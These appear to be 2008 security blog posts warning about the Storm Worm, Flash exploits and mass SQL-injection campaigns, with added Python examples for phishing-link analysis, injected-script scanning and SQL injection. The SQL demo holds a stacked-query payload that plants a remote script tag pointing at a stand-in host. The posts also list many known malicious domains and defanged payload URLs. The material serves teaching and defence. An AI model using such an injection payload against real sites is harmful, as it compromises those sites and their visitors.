Malware


Well, happy 4th of July to all the folks here in the US.  Hope everyone has a safe one today.  Just a little warning.  The Storm Worm still lives and, as expected, there is a wave of e-mails trying to get you to download an executable called fireworks.exe.  Just remember, do not click on links or attachments in unsolicited e-mails.  Click here for the Internet Storm Center story relating to this subject.

Happy 4th everyone!!

Read this story on usatoday.com; it basically backs up why bad guys can take advantage of millions of web surfers out there.  Click here for the usatoday story.  I guess I should not complain, because this reinforces why I feel that I have job security.  Anyway, here are the scary stats.  If you get one thing out of this posting, please use a patched browser.  Patching is one of the simplest things to do, but so many don’t do it for one reason or another.

Here is an excerpt from a story linked from the usatoday.com article.  This is from the website securitywatch.eweek.com:

While many of us will spend the better part of our adult lives sitting at computers, and more specifically keeping our eyes trained on the cyber-crime ecosystem, can we really expect people who do not to constantly remember to go download new software releases?

According to the researchers, “at most 83.3 percent of Firefox users, 65.3 percent of Safari users, 56.1 percent of Opera users and 47.6 percent of Internet Explorer users were using the latest, most secure browser version on any day between January 2007 [and] June 2008.”

The Firefox number is actually quite surprising. The idea that less than 50 percent of the estimated 577 million people using IE are not on current versions really is not. Firefox users tend to be more technically savvy, as many have specifically sought out the browsers for themselves. Most of the people using IE have it installed on their machines by default.

Based on this information, it’s no wonder the criminal attacker is so successful.  I’m thinking about downloading Opera and testing it as another, more secure browser.  I use Firefox along with add-ons to improve my security.  No way can you be 100% secure.  There will always be those zero-day attacks that no patching can help.  The quick response to vulnerabilities is the reason I use the Ubuntu operating system.

That is it for this post.  Lots of fireworks going off tonight, so the high price of gas hasn’t slowed too many folks from buying fireworks.  Sure has affected me and my 4th of July spending habits.  Have a great Thursday and stay safe.

A little vacation is a really good thing.  But I’m back now and since I haven’t posted too much this month, thought I could inform you of a couple of things.  Attackers go to where the numbers are.  And with Wimbledon Tennis coming up, the ATP site was attacked with those nasty injection attacks.  Be careful out there folks.  It’s a scary world we live in.

Thought I might tell you that Adobe has an update to the PDF reader that almost everyone has, so open the reader, click on Help, then select the Check for Update option.  If you aren’t patched, patch now.  Attackers depend on you not updating your software.

It’s getting hotter and more humid in the middle of the heartland of America.  Stay cool, stay safe, and have a safe celebration with the 4th of July coming next week!

Adobe Flash Player made a lot of headlines last week.  Well, the number of sites injected with code exploiting the Flash Player has increased to over 800,000.  A Google search on com/b.js shows 825,000 pages indexed.  The script is being hosted on many domains, some of which have been noted in this blog and others.  After all the shakeout, it was determined that the current Flash Player (9.0.124.0) is not vulnerable.  So, as I’ve stated in the past, patch, patch, patch.  This time it’s the Adobe Flash Player.

Click here to check which version of Adobe Flash Player is installed on your PC.  If it is not the current version listed above, then download and install it now.  Stay safe as we are now over the hump for the week. Can’t wait till the weekend!  Rock Chalk Jayhawk!!!

A vulnerability has been reported in Adobe Flash Player versions 9.0.124.0 and older; 9.0.124.0 is the current version available for download now. Adobe has not yet released a patch or an official advisory. Symantec has also said that this vulnerability is being exploited by the bad guys as we speak. Adobe will have an update out soon, but at this point it is up to you to protect yourself. Don’t click on unsolicited links or attachments in spam e-mail. Your behavior can go a long way in protecting you on the Internet.

Stay safe and have a great Wednesday!

UPDATE Wednesday, May 28, 2008 16:30 CST

Well, as the day went on, it was found that the current release of Adobe Flash Player (9.0.124.0) is not vulnerable to the attacks that are ongoing at this time. Here is a list of the nasty sites serving up the exploits. WARNING!! Do not visit these sites no matter what!!

tongji123.org
bb.wudiliuliang.com
user1.12-26.net
user1.12-27.net
ageofconans.net
lkjrc.cn
psp1111.cn
zuoyouweinan.com
user1.isee080.net
guccime.net
woai117.cn
wuqing17173.cn
dota11.cn
play0nlnie.com
0novel.com

UPDATE: 053008

Well, this story has more turns in it than a NASCAR event.  Some are even right turns.  First we thought all versions of Adobe Flash Player were vulnerable.  Then we were told that the current version is OK and not vulnerable.  Then Adobe doesn’t come right out and say it, and Symantec is saying that these exploits are working, so just be careful out there.  It seems that the bad guys are using these in new SQL injection attacks.  Have a great Friday!!

A new twist on an old scam: someone reported a spam e-mail that appeared to come from Microsoft. A little quick research online showed this has been around for a few years, but it has a different twist.

Sample Spam

As you can see, this was the entire body of the e-mail.  Nothing to sell.  No e-cards to click on.  No official document from some bogus US court.  Just 3 innocent-looking links from everyone’s friend Microsoft. The text makes you think you subscribed to MSN Featured Offers and they are being kind enough to add an Unsubscribe link. Since you never really subscribed to this in the first place, they are hoping people will click the Unsubscribe link so they won’t have this sent anymore.  All because they respect your privacy. Taking a closer look at the 3 links, they all lead to the same URL. The IP for the URL was registered in the USA. A quick Google search of the domain turned up a lot of Russian-language references to this domain.  After taking a closer look, all this URL did was redirect you to a site that was registered in Korea. This gives you a little more insight into how spam e-mail can be a threat.  If this trail had been followed all the way through, exploits for Microsoft, QuickTime, RealPlayer, and possibly Adobe Reader would have run against the PC, and if it were not patched, remote code execution could be possible, meaning the PC would have been added to someone’s criminal botnet and used in nefarious ways.

Remember what we say, never click on unsolicited links or attachments in e-mail.  Stay safe.
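The two checks described in the post above, that every link in the message goes to one real destination and that the link text names a brand the destination host does not belong to, can be automated. The following is an added example and not code from the original post; the e-mail body, the host offers-update.example.test and the brand-to-domain table are constructed for the demonstration.

```python
"""Pull every link out of an HTML e-mail, group them by real destination, and
flag links whose visible text names a brand the destination host does not
belong to. The message body below is constructed for this example."""
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Brands a sender might name in link text, and the domains those brands use.
# Constructed for the example; extend it with the brands you see spoofed.
BRAND_DOMAINS = {
    "microsoft": ("microsoft.com",),
    "msn": ("msn.com", "microsoft.com"),
}

class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for each <a> element in the body."""
    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "a" and self._href is not None:
            self.anchors.append((self._href, " ".join("".join(self._text).split())))
            self._href = None

def host_of(url):
    """Lower-cased host part of a URL, or '' when there is none."""
    return (urlsplit(url.strip()).hostname or "").lower()

def belongs_to(host, domains):
    """True if host is one of the brand's domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in domains)

def analyze_links(html_body):
    """Return ({href: [link texts]}, [(text, host) for mismatched brand links])."""
    collector = AnchorCollector()
    collector.feed(html_body)
    by_target = defaultdict(list)
    mismatches = []
    for href, text in collector.anchors:
        by_target[href].append(text)
        host = host_of(href)
        for brand, domains in BRAND_DOMAINS.items():
            if brand in text.lower() and not belongs_to(host, domains):
                mismatches.append((text, host))
    return dict(by_target), mismatches

# Constructed sample modelled on the message described above: three links,
# all pointing at one unrelated host.
SAMPLE_BODY = """<html><body>
<p>You are receiving this e-mail because you subscribed to MSN Featured Offers.
Microsoft respects your privacy.</p>
<p><a href="http://offers-update.example.test/?u=1">Microsoft</a> |
<a href="http://offers-update.example.test/?u=1">MSN Featured Offers</a> |
<a href="http://offers-update.example.test/?u=1">Unsubscribe</a></p>
</body></html>"""

if __name__ == "__main__":
    targets, bad = analyze_links(SAMPLE_BODY)
    for href, texts in targets.items():
        print(f"{len(texts)} link(s) -> {href}: {texts}")
    for text, host in bad:
        print(f"link text says {text!r} but the link goes to {host}")
```

Grouping by href is what exposes the "three links, one URL" pattern; the brand check catches the cheaper tell, a Microsoft-branded link whose host is not under microsoft.com. Neither check follows the link, so the redirect chain the post describes stays unvisited.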

Shadowserver.org does great work and informs the security community about the darker side of the Internet. In their most recent posting, they have listed the sites that are serving up the malicious content. Here is the list of malicious domains and the number of sites injected with each one.  Please be advised….DO NOT VISIT ANY OF THESE SITES.

www.nihaorr1.com 468,000
free.hostpinoy.info 444,000
xprmn4u.info 369,000
www.nmidahena.com 140,000
winzipices.cn 75,000
sb.5252.ws 69,000
www.aspder.com 62,000
www.11910.net 47,000
bbs.jueduizuan.com 44,000
www.bluell.cn 44,000
www.2117966.net 39,000
s.see9.us 39,000
xvgaoke.cn 33,000
1.hao929.cn 20,000
www.414151.com 17,000
cc.18dd.net 15,000
yl18.net 15,000
www.kisswow.com.cn 13,000
urkb.net 13,000
c.uc8010.com 9500
rnmb.net 7000
www.ririwow.cn 6000
www.killwow1.cn 4000
www.qiqigm.com 3600
www.wowgm1.cn 3500
www.wowyeye.cn 2800
9i5t.cn 2500
c11.8866.org 2500
computershello.cn 2300
www.z008.net 1600
b15.3322.org 1200
www.direct84.com 1100
www.caocaowow.cn 900
www.qiuxuegm.com 800
firestnamestea.cn 700
%61%2E%6B%61%34%37%2E%75%73 (a.ka47.us) 600
%61%31%38%38%2E%77%73 (a188.ws) 500
n.uc8010.com 250
www.qiqi111.cn 230
heartgames.cn 220
www.adw95.com 170
www.banner82.com 90
smeisp.cn 85
okey123.cn 55
b.kaobt.cn 50
www.nihao112.com 45
al.99.vc 45
www.aidushu.net 45
a.13175.com 40
www.chliyi.com 40
free.edivid.info 40
52-o.cn 40
www.fucksb.net 40
www60.actualization.cn 40
d39.6600.org 40
h28.8800.org 34
001yl.com 30
ucmal.com 30
t.uc8010.com 30
www.dota11.cn 25
m11.3322.org 20
bc0.cn 20
%33%2E%74%72%6F%6A%61%6E%38%2E%63%6F%6D (3.trojan8.com) 20
www.adword71.com 17
killpp.cn 16
w11.6600.org 13
usuc.us 13
www.msshamof.com 10
newasp.com.cn 7
www.wowgm2.cn 8
mm.jsjwh.com.cn 8
17ge.cn 4
www.adword72.com 2
www.117275.cn 1
vb008.cn ?
www.wow112.cn ?
www.nihaoel3.com ?

I work in computer security.  We see a lot of attacks from some bad people.  What trends are we seeing, and what will attacks look like in the near future?  Here are my thoughts.  I read a lot of tech sites and listen to tech podcasts, and you hear a lot of opinions.  The biggest trend this year will be legitimate sites being hacked and malicious code injected into them so that they serve up attacks on unknowing visitors.

We started seeing this trend in early 2007 with the Dolphin Stadium site just before the Super Bowl.  Then it got quiet until the end of the year, and since then things have picked up.  Things are going to get worse.  Malicious tool kits can be bought on the Internet, and you can change the attacks as new ones are found and old ones are patched.  This attack vector is very efficient.  Some attacks can affect hundreds of thousands of pages in a short period of time.
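How one injectable parameter turns into malicious code on every page a site serves, as an added example (not the author's code, and not a reconstruction of any particular campaign): a story-view counter that pastes its id parameter into SQL, beside the hardened form. The table, the endpoint and the host evil.example.test are constructed for the demonstration.

```python
"""A vulnerable story-view counter beside its hardened form, showing how one
injectable parameter lets an attacker append a remote <script> tag to every
row the site later renders. The endpoint, table and host are constructed."""
import sqlite3

# Placeholder for the attacker's script host (constructed for this example).
INJECTED_TAG = "<script src=http://evil.example.test/b.js></script>"

def build_db():
    """In-memory site database with two news stories."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, "
                "body TEXT, views INTEGER DEFAULT 0)")
    con.executemany("INSERT INTO news (title, body) VALUES (?, ?)", [
        ("Opening day", "Gates open at 9."),
        ("Parking", "Lot B is closed this week."),
    ])
    con.commit()
    return con

def bump_views_vulnerable(con, story_id):
    """story_id is pasted into the SQL text, and executescript runs every
    ';'-separated statement (as batch-capable database drivers do), so a second
    statement supplied in the parameter runs with the site's privileges."""
    con.executescript("UPDATE news SET views = views + 1 WHERE id = " + story_id + ";")

def bump_views_safe(con, story_id):
    """Validate the type, then bind the value: the database never parses it as SQL."""
    sid = int(story_id)                     # ValueError on anything but an integer
    con.execute("UPDATE news SET views = views + 1 WHERE id = ?", (sid,))
    con.commit()

def render(con):
    """Render every story the way the site's pages would, trusting stored HTML."""
    rows = con.execute("SELECT title, body FROM news ORDER BY id").fetchall()
    return "\n".join(f"<h2>{title}</h2><p>{body}</p>" for title, body in rows)

# What the attacker sends as the ?id= value: a valid id, then a stacked UPDATE
# that appends the tag to every row's body.
ATTACK_PARAM = "1; UPDATE news SET body = body || '" + INJECTED_TAG + "'"

def demo():
    """Return (stories tainted via the vulnerable path, whether the safe path
    rejected the parameter, stories tainted via the safe path)."""
    con = build_db()
    bump_views_vulnerable(con, ATTACK_PARAM)
    tainted = render(con).count(INJECTED_TAG)

    con = build_db()
    try:
        bump_views_safe(con, ATTACK_PARAM)
        rejected = False
    except ValueError:
        rejected = True
    return tainted, rejected, render(con).count(INJECTED_TAG)

if __name__ == "__main__":
    print(demo())   # (2, True, 0)
```

The attacker never needs a login: a single GET with a crafted id rewrites every row, and from then on the site itself delivers the tag to each visitor. Binding the parameter is the fix; the integer check in front of it is belt-and-braces, and escaping stored text on output would be a further layer for fields that are not meant to hold HTML.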

What is going to come in the not-so-far future in computer security?  I believe those who say that different types of hardware other than the actual PC will be targeted soon.  Routers controlled by attackers who can use a form of DNS poisoning to direct you to their bad paypal.com.  You won’t be able to tell you aren’t really on the real paypal.com site.  These hardware devices need to be secured and upgraded with security updates too.  Let me ask you a question about the router you use in your home.  When was the last time you logged into that wireless router you own and updated the firmware?  Never?  I’m sure there have been updates.  Learn how to maintain all the devices that you have.

I feel pretty secure surfing the web, but I take steps to avoid going to risky places and I use as many things as I can to help defend against those evil criminal attackers out on the Internet.  Patch.  It’s simple and a huge step in the right direction.  I read a lot.  I try sharing it with you.  The common man or woman does not keep up with all the threats out there.  The one resource I would start reading is the Internet Storm Center.  They are sort of a warehouse of information relating to threats on the net and what you can do to protect yourself.

That is it for now.  The weekend is getting so close I can taste it.  Stay safe and have a happy Thursday.

Most of the time, attacks from the Internet are silent.  You may not have realized that clicking on your favorite web site silently redirected you to a server in China and then exploits for Microsoft’s Internet Explorer, Firefox, QuickTime, RealPlayer, and other applications were run against your PC. If you haven’t patched all your software, some bad guy attacker might just be able to take control of your machine and execute code remotely.  Those are words you really don’t want to hear.

Eventually, your anti-virus vendor gets the signatures of the bad software loaded on your machine and can clean it off.  But how did it get there?  What do I use my PC for?  Do I bank online?  Do I access my investment accounts online?  Do I store personal information about myself or my family in a document saved on the PC’s hard drive?  Then you need to take steps to figure out just what happened.

First of all, is your software patched?  If not, then download your patches from Microsoft, Apple, RealPlayer, or any other applications and apply those security patches.  Set up a process to make sure your PC is scanned regularly and that you check for patches regularly.

Can you find out if sites you visit have been hacked?  Sometimes you won’t know unless you really follow stories posted online.  If it is a big name site like CNN.com or USAToday.com, then you might know.  Hundreds of thousands of sites get hacked and you never really know.  You could possibly defend against these attacks by using a tool called NoScript with your Firefox browser.

Do you store passwords for sites so they are filled in when you browse to them?  Are any of those sites holding a credit card of yours?  If you’ve read my blog much, I advise you not to use the function that will remember passwords to sites.

One thing you will have to remember.  The Internet was not set up to handle secure transactions.  It was set up to share information.  Bad guys are taking advantage of all the vulnerabilities out there.  I cannot guarantee you will be completely safe even following all these steps.  You can follow best practices and be safer than the average person.  If you have teenagers, your battle will be an uphill fight.  Teenagers trust everyone, clicking things that need not be clicked.  Think about having a computer you adults use, then one that the teenagers use.  You’ll still have to fight off attacks on the teenagers’ PC.

Good luck and stay safe.  I’m ready for SUMMER!!!

Yep, you are reading that headline right. Yet another new code injection attack. Just prior to writing this post, a search showed 855,000 pages infected with some malicious (BAD!!) code that was injected into legitimate sites. NoScript is one defense, since this code is hosted on another domain.

The attack that I wrote about that started last week just hasn’t really taken off. Doing a Google search shows 25,500 pages that were affected by this one. It is early in the game for both of these attacks so more details will come out later. I’ll do more checking on the current attacks to see where those bad sites are being hosted.

The two sites in this new attack are listed below.  I’ve altered the URLs.  My advice is NOT to go to either of these sites.

hxxp://free.hostpinoy.info/f.js
hxxp://xprmn4u.info/f.js
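The f.js and b.js injections above, and the Shadowserver list earlier on this page, all share one shape: a <script src=...> tag appended to a legitimate page, pulling code from another host. That is also why NoScript helps, and it is something you can check for without visiting the malicious host. The following is an added example, not code from the original post: it scans a page's HTML for scripts loaded from a host other than the page's own and flags any on a denylist. The denylist holds a handful of hosts quoted on this page, two in the percent-encoded form the Shadowserver list uses, and the sample page and the host cdn.example.test are constructed.

```python
"""Scan a page's HTML for <script src=...> tags that pull code from another
host, and flag hosts on a denylist. Hostnames are normalized the way the
Shadowserver list shows some of them: percent-encoded (%61%2E... is a.ka47.us)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Constructed denylist: a handful of the hosts quoted on this page, two of them
# in the percent-encoded form the list uses. A real scan would load the full list.
DENYLIST = {
    "www.nihaorr1.com",
    "free.hostpinoy.info",
    "xprmn4u.info",
    "%61%2E%6B%61%34%37%2E%75%73",              # a.ka47.us
    "%33%2E%74%72%6F%6A%61%6E%38%2E%63%6F%6D",  # 3.trojan8.com
}

def normalize_host(host):
    """Decode percent-encoding, lowercase, drop a trailing dot, so that encoded,
    mixed-case and FQDN spellings of one host all compare equal."""
    return unquote(host).strip().lower().rstrip(".")

NORMALIZED_DENYLIST = {normalize_host(h) for h in DENYLIST}

def script_host(src):
    """Return the normalized host a script src loads from, or None when the
    src is relative (same-origin). Defanged hxxp:// spellings are accepted."""
    s = re.sub(r"^hxxp(s?)://", r"http\1://", src.strip(), flags=re.IGNORECASE)
    if s.startswith("//"):             # protocol-relative still names a host
        s = "http:" + s
    host = urlsplit(s).hostname
    return normalize_host(host) if host else None

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, quoted or not."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)

def find_injected_scripts(html, page_host):
    """Return (src, host, verdict) for each script served from a host other than
    page_host; verdict is 'denylisted' or 'third-party'."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    own = normalize_host(page_host)
    findings = []
    for src in collector.srcs:
        host = script_host(src)
        if host is None or host == own:
            continue
        verdict = "denylisted" if host in NORMALIZED_DENYLIST else "third-party"
        findings.append((src, host, verdict))
    return findings

# Constructed sample page: one local script, one legitimate CDN, and two tags
# appended to the end of the document, the pattern these posts describe.
SAMPLE_PAGE = """<html><head><title>Schedule</title>
<script src="/js/site.js"></script>
<script src="http://cdn.example.test/lib.js"></script>
</head><body><p>Match times</p>
<script src="http://%61%2E%6B%61%34%37%2E%75%73/f.js"></script>
<script src=http://free.hostpinoy.info/f.js></script></body></html>"""

if __name__ == "__main__":
    for src, host, verdict in find_injected_scripts(SAMPLE_PAGE, "www.example.test"):
        print(f"{verdict:12} {host:30} {src}")
```

Run it against a saved copy of a page (curl the HTML with scripting disabled, or take it from a proxy log) rather than in a browser. Any third-party script is worth a look on a site that should not have one; a denylisted host is the injection itself, and the percent-encoded spelling is exactly what a naive string match on "ka47.us" would miss.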

Stay safe and HAPPY MOTHER’S DAY!!!
